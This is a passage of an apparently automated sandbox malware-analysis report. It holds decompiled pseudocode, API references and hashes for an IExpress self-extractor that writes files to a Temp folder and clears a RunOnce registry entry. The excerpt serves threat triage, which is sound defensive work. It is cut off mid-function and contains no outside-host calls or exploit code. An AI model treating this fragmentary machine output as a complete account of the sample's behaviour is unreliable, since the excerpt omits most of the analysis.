                            • LocalFree.KERNEL32(00D582B0,?,00000000), ref: 00EB5305
                            • LocalFree.KERNEL32(00D582B0), ref: 00EB530C
                            • SetCurrentDirectoryA.KERNELBASE(00EB11FC,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00EB5363
                            Strings
                            • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00EB5334
                            Memory Dump Source
                            • Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_eb0000_file.jbxd
                            Similarity
                            • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                            • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                            • API String ID: 2833751637-388467436
                            • Opcode ID: 4341b41035c7c0f807e6ae21e34015e9d52fa79f9606ca2276f1d87a38424b81
                            • Instruction ID: 5453ae3ad3de13665093d9d8f9fe539499cccb33202d2c57e3d86df2b077d7dd
                            • Opcode Fuzzy Hash: 4341b41035c7c0f807e6ae21e34015e9d52fa79f9606ca2276f1d87a38424b81
                            • Instruction Fuzzy Hash: B921C232501604DFDB25AF25ED19BEB77E8EB00354F081269E542723A5CFB45C88CB40
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00EB1FE1(void* __ecx) {
                            				void* _v8;
                            				long _t4;
                            
                            				if( *0xeb8530 != 0) {
                            					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                            					if(_t4 == 0) {
                            						RegDeleteValueA(_v8, "wextract_cleanup0"); // executed
                            						return RegCloseKey(_v8);
                            					}
                            				}
                            				return _t4;
                            			}





                            0x00eb1fee
                            0x00eb2005
                            0x00eb200d
                            0x00eb2017
                            0x00000000
                            0x00eb2020
                            0x00eb200d
                            0x00eb2029

                            APIs
                            • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,00EB538C,?,?,00EB538C), ref: 00EB2005
                            • RegDeleteValueA.KERNELBASE(00EB538C,wextract_cleanup0,?,?,00EB538C), ref: 00EB2017
                            • RegCloseKey.ADVAPI32(00EB538C,?,?,00EB538C), ref: 00EB2020
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_eb0000_file.jbxd
                            Similarity
                            • API ID: CloseDeleteOpenValue
                            • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
                            • API String ID: 849931509-702805525
                            • Opcode ID: ad90288465000d1b0cfbf8c69e10a243222fea1e8009c0920762b74e7f8ffd59
                            • Instruction ID: 530d7efc2bf426ad190a6a292d50387cc19d1684fa980bdddc68eafd2133f662
                            • Opcode Fuzzy Hash: ad90288465000d1b0cfbf8c69e10a243222fea1e8009c0920762b74e7f8ffd59
                            • Instruction Fuzzy Hash: 92E04F30551318BFEB31AB92EE0AF9B7B6EEB04784F1402A8BA05B0160EB615A18D715
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 94%
                            			E00EB4CD0(char* __edx, long _a4, int _a8) {
                            				signed int _v8;
                            				char _v268;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				signed int _t29;
                            				int _t30;
                            				long _t32;
                            				signed int _t33;
                            				long _t35;
                            				long _t36;
                            				struct HWND__* _t37;
                            				long _t38;
                            				long _t39;
                            				long _t41;
                            				long _t44;
                            				long _t45;
                            				long _t46;
                            				signed int _t50;
                            				long _t51;
                            				char* _t58;
                            				long _t59;
                            				char* _t63;
                            				long _t64;
                            				CHAR* _t71;
                            				CHAR* _t74;
                            				int _t75;
                            				signed int _t76;
                            
                            				_t69 = __edx;
                            				_t29 =  *0xeb8004; // 0x92ae1240
                            				_t30 = _t29 ^ _t76;
                            				_v8 = _t30;
                            				_t75 = _a8;
                            				if( *0xeb91d8 == 0) {
                            					_t32 = _a4;
                            					__eflags = _t32;
                            					if(_t32 == 0) {
                            						_t33 = E00EB4E99(_t75);
                            						L35:
                            						return E00EB6CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
                            					}
                            					_t35 = _t32 - 1;
                            					__eflags = _t35;
                            					if(_t35 == 0) {
                            						L9:
                            						_t33 = 0;
                            						goto L35;
                            					}
                            					_t36 = _t35 - 1;
                            					__eflags = _t36;
                            					if(_t36 == 0) {
                            						_t37 =  *0xeb8584; // 0x0
                            						__eflags = _t37;
                            						if(_t37 != 0) {
                            							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
                            						}
                            						_t54 = 0xeb91e4;
                            						_t58 = 0xeb91e4;
                            						do {
                            							_t38 =  *_t58;
                            							_t58 =  &(_t58[1]);
                            							__eflags = _t38;
                            						} while (_t38 != 0);
                            						_t59 = _t58 - 0xeb91e5;
                            						__eflags = _t59;
                            						_t71 =  *(_t75 + 4);
                            						_t73 =  &(_t71[1]);
                            						do {
                            							_t39 =  *_t71;
                            							_t71 =  &(_t71[1]);
                            							__eflags = _t39;
                            						} while (_t39 != 0);
                            						_t69 = _t71 - _t73;
                            						_t30 = _t59 + 1 + _t71 - _t73;
                            						__eflags = _t30 - 0x104;
                            						if(_t30 >= 0x104) {
                            							L3:
                            							_t33 = _t30 | 0xffffffff;
                            							goto L35;
                            						}
                            						_t69 = 0xeb91e4;
                            						_t30 = E00EB4702( &_v268, 0xeb91e4,  *(_t75 + 4));
                            						__eflags = _t30;
                            						if(__eflags == 0) {
                            							goto L3;
                            						}
                            						_t41 = E00EB476D( &_v268, __eflags);
                            						__eflags = _t41;
                            						if(_t41 == 0) {
                            							goto L9;
                            						}
                            						_push(0x180);
                            						_t30 = E00EB4980( &_v268, 0x8302); // executed
                            						_t75 = _t30;
                            						__eflags = _t75 - 0xffffffff;
                            						if(_t75 == 0xffffffff) {
                            							goto L3;
                            						}
                            						_t30 = E00EB47E0( &_v268);
                            						__eflags = _t30;
                            						if(_t30 == 0) {
                            							goto L3;
                            						}
                            						 *0xeb93f4 =  *0xeb93f4 + 1;
                            						_t33 = _t75;
                            						goto L35;
                            					}
                            					_t44 = _t36 - 1;
                            					__eflags = _t44;
                            					if(_t44 == 0) {
                            						_t54 = 0xeb91e4;
                            						_t63 = 0xeb91e4;
                            						do {
                            							_t45 =  *_t63;
                            							_t63 =  &(_t63[1]);
                            							__eflags = _t45;
                            						} while (_t45 != 0);
                            						_t74 =  *(_t75 + 4);
                            						_t64 = _t63 - 0xeb91e5;
                            						__eflags = _t64;
                            						_t69 =  &(_t74[1]);
                            						do {
                            							_t46 =  *_t74;
                            							_t74 =  &(_t74[1]);
                            							__eflags = _t46;
                            						} while (_t46 != 0);
                            						_t73 = _t74 - _t69;
                            						_t30 = _t64 + 1 + _t74 - _t69;
                            						__eflags = _t30 - 0x104;
                            						if(_t30 >= 0x104) {
                            							goto L3;
                            						}
                            						_t69 = 0xeb91e4;
                            						_t30 = E00EB4702( &_v268, 0xeb91e4,  *(_t75 + 4));
                            						__eflags = _t30;
                            						if(_t30 == 0) {
                            							goto L3;
                            						}
                            						_t69 =  *((intOrPtr*)(_t75 + 0x18));
                            						_t30 = E00EB4C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
                            						__eflags = _t30;
                            						if(_t30 == 0) {
                            							goto L3;
                            						}
                            						E00EB4B60( *((intOrPtr*)(_t75 + 0x14))); // executed
                            						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
                            						__eflags = _t50;
                            						if(_t50 != 0) {
                            							_t51 = _t50 & 0x00000027;
                            							__eflags = _t51;
                            						} else {
                            							_t51 = 0x80;
                            						}
                            						_t30 = SetFileAttributesA( &_v268, _t51); // executed
                            						__eflags = _t30;
                            						if(_t30 == 0) {
                            							goto L3;
                            						} else {
                            							_t33 = 1;
                            							goto L35;
                            						}
                            					}
                            					_t30 = _t44 - 1;
                            					__eflags = _t30;
                            					if(_t30 == 0) {
                            						goto L3;
                            					}
                            					goto L9;
                            				}
                            				if(_a4 == 3) {
                            					_t30 = E00EB4B60( *((intOrPtr*)(_t75 + 0x14)));
                            				}
                            				goto L3;
                            			}































                            0x00eb4cd0
                            0x00eb4cdb
                            0x00eb4ce0
                            0x00eb4ce2
                            0x00eb4cee
                            0x00eb4cf2
                            0x00eb4d0e
                            0x00eb4d0e
                            0x00eb4d11
                            0x00eb4e83
                            0x00eb4e88
                            0x00eb4e98
                            0x00eb4e98
                            0x00eb4d17
                            0x00eb4d17
                            0x00eb4d1a
                            0x00eb4d2f
                            0x00eb4d2f
                            0x00000000
                            0x00eb4d2f
                            0x00eb4d1c
                            0x00eb4d1c
                            0x00eb4d1f
                            0x00eb4dcb
                            0x00eb4dd0
                            0x00eb4dd2
                            0x00eb4ddd
                            0x00eb4ddd
                            0x00eb4de3
                            0x00eb4de8
                            0x00eb4ded
                            0x00eb4ded
                            0x00eb4def
                            0x00eb4df0
                            0x00eb4df0
                            0x00eb4df4
                            0x00eb4df4
                            0x00eb4df6
                            0x00eb4df9
                            0x00eb4dfc
                            0x00eb4dfc
                            0x00eb4dfe
                            0x00eb4dff
                            0x00eb4dff
                            0x00eb4e03
                            0x00eb4e08
                            0x00eb4e0a
                            0x00eb4e0f
                            0x00eb4d03
                            0x00eb4d03
                            0x00000000
                            0x00eb4d03
                            0x00eb4e18
                            0x00eb4e20
                            0x00eb4e25
                            0x00eb4e27
                            0x00000000
                            0x00000000
                            0x00eb4e33
                            0x00eb4e38
                            0x00eb4e3a
                            0x00000000
                            0x00000000
                            0x00eb4e40
                            0x00eb4e51
                            0x00eb4e56
                            0x00eb4e5b
                            0x00eb4e5e
                            0x00000000
                            0x00000000
                            0x00eb4e6a
                            0x00eb4e6f
                            0x00eb4e71
                            0x00000000
                            0x00000000
                            0x00eb4e77
                            0x00eb4e7d
                            0x00000000
                            0x00eb4e7d
                            0x00eb4d25
                            0x00eb4d25
                            0x00eb4d28
                            0x00eb4d36
                            0x00eb4d3b
                            0x00eb4d40
                            0x00eb4d40
                            0x00eb4d42
                            0x00eb4d43
                            0x00eb4d43
                            0x00eb4d47
                            0x00eb4d4a
                            0x00eb4d4a
                            0x00eb4d4c
                            0x00eb4d4f
                            0x00eb4d4f
                            0x00eb4d51
                            0x00eb4d52
                            0x00eb4d52
                            0x00eb4d56
                            0x00eb4d5b
                            0x00eb4d5d
                            0x00eb4d62
                            0x00000000
                            0x00000000
                            0x00eb4d67
                            0x00eb4d6f
                            0x00eb4d74
                            0x00eb4d76
                            0x00000000
                            0x00000000
                            0x00eb4d7c
                            0x00eb4d84
                            0x00eb4d89
                            0x00eb4d8b
                            0x00000000
                            0x00000000
                            0x00eb4d94
                            0x00eb4d99
                            0x00eb4d9e
                            0x00eb4da1
                            0x00eb4daa
                            0x00eb4daa
                            0x00eb4da3
                            0x00eb4da3
                            0x00eb4da3
                            0x00eb4db5
                            0x00eb4dbb
                            0x00eb4dbd
                            0x00000000
                            0x00eb4dc3
                            0x00eb4dc5
                            0x00000000
                            0x00eb4dc5
                            0x00eb4dbd
                            0x00eb4d2a
                            0x00eb4d2a
                            0x00eb4d2d
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00eb4d2d
                            0x00eb4cf8
                            0x00eb4cfd
                            0x00eb4d02
                            0x00000000

                            APIs
                            • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00EB4DB5
                            • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00EB4DDD
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_eb0000_file.jbxd
                            Similarity
                            • API ID: AttributesFileItemText
                            • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                            • API String ID: 3625706803-388467436
                            • Opcode ID: 4ec270bce5051fa47b6127ac832f8f66670493e33272013163029e84314d76e2
                            • Instruction ID: e41464ba922ea05dbcb77ab645ecd7a2048c0ddd4c18347e2e819d1a5c80ee5f
                            • Opcode Fuzzy Hash: 4ec270bce5051fa47b6127ac832f8f66670493e33272013163029e84314d76e2
                            • Instruction Fuzzy Hash: AC4113B62001068BCF229F38DD546F7B3A5EB45308F046A69E882B72D7DE31DE4AC750
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00EB4C37(signed int __ecx, int __edx, int _a4) {
                            				struct _FILETIME _v12;
                            				struct _FILETIME _v20;
                            				FILETIME* _t14;
                            				int _t15;
                            				signed int _t21;
                            
                            				_t21 = __ecx * 0x18;
                            				if( *((intOrPtr*)(_t21 + 0xeb8d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                            					L5:
                            					return 0;
                            				} else {
                            					_t14 =  &_v12;
                            					_t15 = SetFileTime( *(_t21 + 0xeb8d74), _t14, _t14, _t14); // executed
                            					if(_t15 == 0) {
                            						goto L5;
                            					}
                            					return 1;
                            				}
                            			}








                            0x00eb4c40
                            0x00eb4c4a
                            0x00eb4c8d
                            0x00000000
                            0x00eb4c70
                            0x00eb4c70
                            0x00eb4c7e
                            0x00eb4c86
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00eb4c8a

                            APIs
                            • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00EB4C54
                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00EB4C66
                            • SetFileTime.KERNELBASE(?,?,?,?), ref: 00EB4C7E
                            Memory Dump Source
                            • Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_eb0000_file.jbxd
                            Similarity
                            • API ID: Time$File$DateLocal
                            • String ID:
                            • API String ID: 2071732420-0
                            • Opcode ID: 37a12ce84d371541cb53ee0883ce139460ea6ae65d5fadf26e05909ba1781239
                            • Instruction ID: 2c4f70a65a1c0563aad1baa3d3f28a6de98875b21a2830c2f05cacfc7a420da1
                            • Opcode Fuzzy Hash: 37a12ce84d371541cb53ee0883ce139460ea6ae65d5fadf26e05909ba1781239
                            • Instruction Fuzzy Hash: 52F096B250110D6FAF25DFB5CC48DFBBBADEB04644B44063BA915F1091EA30D914CB70
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 75%
                            			E00EB487A(CHAR* __ecx, signed int __edx) {
                            				void* _t7;
                            				CHAR* _t11;
                            				long _t18;
                            				long _t23;
                            
                            				_t11 = __ecx;
                            				asm("sbb edi, edi");
                            				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                            				if((__edx & 0x00000100) == 0) {
                            					asm("sbb esi, esi");
                            					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                            				} else {
                            					if((__edx & 0x00000400) == 0) {
                            						asm("sbb esi, esi");
                            						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                            					} else {
                            						_t23 = 1;
                            					}
                            				}
                            				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                            				if(_t7 != 0xffffffff || _t23 == 3) {
                            					return _t7;
                            				} else {
                            					E00EB490C(_t11);
                            					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                            				}
                            			}







                            0x00eb4880
                            0x00eb488c
                            0x00eb4894
                            0x00eb48a0
                            0x00eb48c9
                            0x00eb48ce
                            0x00eb48a2
                            0x00eb48a8
                            0x00eb48b7
                            0x00eb48bc
                            0x00eb48aa
                            0x00eb48ac
                            0x00eb48ac
                            0x00eb48a8
                            0x00eb48de
                            0x00eb48e7
                            0x00eb490b
                            0x00eb48ee
                            0x00eb48f0
                            0x00000000
                            0x00eb4902

                            APIs
                            • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00EB4A23,?,00EB4F67,*MEMCAB,00008000,00000180), ref: 00EB48DE
                            • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00EB4F67,*MEMCAB,00008000,00000180), ref: 00EB4902
                            Memory Dump Source
                            • Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_eb0000_file.jbxd
                            Similarity
                            • API ID: CreateFile
                            • String ID:
                            • API String ID: 823142352-0
                            • Opcode ID: cbc80d915b92b001f3875163793a2767450ea9730ffdaae4fb6082061d53eeff
                            • Instruction ID: d32d353eba0ade80d90dadb62fa858817077f0cce044e5e80dcc9eba7b28d53b
                            • Opcode Fuzzy Hash: cbc80d915b92b001f3875163793a2767450ea9730ffdaae4fb6082061d53eeff
                            • Instruction Fuzzy Hash: 3C0124E3E126712AF62950298C88FF7555CCBD6638F1A2335BDAAB62D2D5644C0482E0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 93%
                            			E00EB4AD0(signed int _a4, void* _a8, long _a12) {
                            				signed int _t9;
                            				int _t12;
                            				signed int _t14;
                            				signed int _t15;
                            				void* _t20;
                            				struct HWND__* _t21;
                            				signed int _t24;
                            				signed int _t25;
                            
                            				_t20 =  *0xeb858c; // 0x270
                            				_t9 = E00EB3680(_t20);
                            				if( *0xeb91d8 == 0) {
                            					_push(_t24);
                            					_t12 = WriteFile( *(0xeb8d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                            					if(_t12 != 0) {
                            						_t25 = _a12;
                            						if(_t25 != 0xffffffff) {
                            							_t14 =  *0xeb9400; // 0x8f800
                            							_t15 = _t14 + _t25;
                            							 *0xeb9400 = _t15;
                            							if( *0xeb8184 != 0) {
                            								_t21 =  *0xeb8584; // 0x0
                            								if(_t21 != 0) {
                            									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0xeb93f8, 0);
                            								}
                            							}
                            						}
                            					} else {
                            						_t25 = _t24 | 0xffffffff;
                            					}
                            					return _t25;
                            				} else {
                            					return _t9 | 0xffffffff;
                            				}
                            			}











                            0x00eb4ad5
                            0x00eb4adb
                            0x00eb4ae7
                            0x00eb4aee
                            0x00eb4b05
                            0x00eb4b0d
                            0x00eb4b14
                            0x00eb4b1a
                            0x00eb4b1c
                            0x00eb4b21
                            0x00eb4b2a
                            0x00eb4b2f
                            0x00eb4b31
                            0x00eb4b39
                            0x00eb4b54
                            0x00eb4b54
                            0x00eb4b39
                            0x00eb4b2f
                            0x00eb4b0f
                            0x00eb4b0f
                            0x00eb4b0f
                            0x00eb4b5e
                            0x00eb4ae9
                            0x00eb4aed
                            0x00eb4aed

                            APIs
                              • Part of subcall function 00EB3680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00EB369F
                              • Part of subcall function 00EB3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00EB36B2
                              • Part of subcall function 00EB3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00EB36DA
                            • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00EB4B05
                            Memory Dump Source
                            • Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_eb0000_file.jbxd
                            Similarity
                            • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                            • String ID:
                            • API String ID: 1084409-0
                            • Opcode ID: 26b260d71c434e2b72e1a0e8a4535ddab730c8a0cd4c93c17fa2be99b39b565d
                            • Instruction ID: 1e9d3164e9f83e1e20cf0e786ca481480571e92a0b39172b6323fa3579d6686f
                            • Opcode Fuzzy Hash: 26b260d71c434e2b72e1a0e8a4535ddab730c8a0cd4c93c17fa2be99b39b565d
                            • Instruction Fuzzy Hash: BF018071201201AFDB158F6AEC55BE37759AB44729F149326FA39B72E2CB70D815CB40
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00EB658A(char* __ecx, void* __edx, char* _a4) {
                            				intOrPtr _t4;
                            				char* _t6;
                            				char* _t8;
                            				void* _t10;
                            				void* _t12;
                            				char* _t16;
                            				intOrPtr* _t17;
                            				void* _t18;
                            				char* _t19;
                            
                            				_t16 = __ecx;
                            				_t10 = __edx;
                            				_t17 = __ecx;
                            				_t1 = _t17 + 1; // 0xeb8b3f
                            				_t12 = _t1;
                            				do {
                            					_t4 =  *_t17;
                            					_t17 = _t17 + 1;
                            				} while (_t4 != 0);
                            				_t18 = _t17 - _t12;
                            				_t2 = _t18 + 1; // 0xeb8b40
                            				if(_t2 < __edx) {
                            					_t19 = _t18 + __ecx;
                            					if(_t19 > __ecx) {
                            						_t8 = CharPrevA(__ecx, _t19); // executed
                            						if( *_t8 != 0x5c) {
                            							 *_t19 = 0x5c;
                            							_t19 =  &(_t19[1]);
                            						}
                            					}
                            					_t6 = _a4;
                            					 *_t19 = 0;
                            					while( *_t6 == 0x20) {
                            						_t6 = _t6 + 1;
                            					}
                            					return E00EB16B3(_t16, _t10, _t6);
                            				}
                            				return 0x8007007a;
                            			}












                            0x00eb6592
                            0x00eb6594
                            0x00eb6596
                            0x00eb6598
                            0x00eb6598
                            0x00eb659b
                            0x00eb659b
                            0x00eb659d
                            0x00eb659e
                            0x00eb65a2
                            0x00eb65a4
                            0x00eb65a9
                            0x00eb65b2
                            0x00eb65b6
                            0x00eb65ba
                            0x00eb65c3
                            0x00eb65c5
                            0x00eb65c8
                            0x00eb65c8
                            0x00eb65c3
                            0x00eb65c9
                            0x00eb65cc
                            0x00eb65d2
                            0x00eb65d1
                            0x00eb65d1
                            0x00000000
                            0x00eb65dc
                            0x00000000

                            APIs
                            • CharPrevA.USER32(00EB8B3E,00EB8B3F,00000001,00EB8B3E,-00000003,?,00EB60EC,00EB1140,?), ref: 00EB65BA
                            Memory Dump Source
                            • Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_eb0000_file.jbxd
                            Similarity
                            • API ID: CharPrev
                            • String ID:
                            • API String ID: 122130370-0
                            • Opcode ID: b6c4045ea792b4577c2dc8428838f2b8d749ba652f4ecfd90dc40bcfdcc2cdb9
                            • Instruction ID: 947a0946ce59cf559adedfb4af84fe99512aa7f3332d7f1d058cbcef0fc9b816
                            • Opcode Fuzzy Hash: b6c4045ea792b4577c2dc8428838f2b8d749ba652f4ecfd90dc40bcfdcc2cdb9
                            • Instruction Fuzzy Hash: 50F04C321052509FD731091D9884BE7BFDEDB86350F28196EE9DAF3249CA6D8C5683A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 93%
                            			E00EB621E() {
                            				signed int _v8;
                            				char _v268;
                            				signed int _t5;
                            				void* _t9;
                            				void* _t13;
                            				void* _t19;
                            				void* _t20;
                            				signed int _t21;
                            
                            				_t5 =  *0xeb8004; // 0x92ae1240
                            				_v8 = _t5 ^ _t21;
                            				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                            					0x4f0 = 2;
                            					_t9 = E00EB597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                            				} else {
                            					E00EB44B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                            					 *0xeb9124 = E00EB6285();
                            					_t9 = 0;
                            				}
                            				return E00EB6CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                            			}











                            0x00eb6229
                            0x00eb6230
                            0x00eb6247
                            0x00eb626a
                            0x00eb6272
                            0x00eb6249
                            0x00eb6255
                            0x00eb625f
                            0x00eb6264
                            0x00eb6264
                            0x00eb6284

                            APIs
                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00EB623F
                              • Part of subcall function 00EB44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00EB4518
                              • Part of subcall function 00EB44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00EB4554
                              • Part of subcall function 00EB6285: GetLastError.KERNEL32(00EB5BBC), ref: 00EB6285
                            Memory Dump Source
                            • Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_eb0000_file.jbxd
                            Similarity
                            • API ID: DirectoryErrorLastLoadMessageStringWindows
                            • String ID:
                            • API String ID: 381621628-0
                            • Opcode ID: e6ad87c6a67d3b0e7313e2095b490385a12eb261e2f2f0be9bdef748efca9d9b
                            • Instruction ID: 5f1345057b1ccba1d7a5fdd7f58dc7e8133679ecb998a7caf26f28e7e120b733
                            • Opcode Fuzzy Hash: e6ad87c6a67d3b0e7313e2095b490385a12eb261e2f2f0be9bdef748efca9d9b
                            • Instruction Fuzzy Hash: 8BF0B4B07002086FE750EB749D02BFB76ECDB44700F400069AA85F6192ED789D448650
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00EB4B60(signed int _a4) {
                            				signed int _t9;
                            				signed int _t15;
                            
                            				_t15 = _a4 * 0x18;
                            				if( *((intOrPtr*)(_t15 + 0xeb8d64)) != 1) {
                            					_t9 = FindCloseChangeNotification( *(_t15 + 0xeb8d74)); // executed
                            					if(_t9 == 0) {
                            						return _t9 | 0xffffffff;
                            					}
                            					 *((intOrPtr*)(_t15 + 0xeb8d60)) = 1;
                            					return 0;
                            				}
                            				 *((intOrPtr*)(_t15 + 0xeb8d60)) = 1;
                            				 *((intOrPtr*)(_t15 + 0xeb8d68)) = 0;
                            				 *((intOrPtr*)(_t15 + 0xeb8d70)) = 0;
                            				 *((intOrPtr*)(_t15 + 0xeb8d6c)) = 0;
                            				return 0;
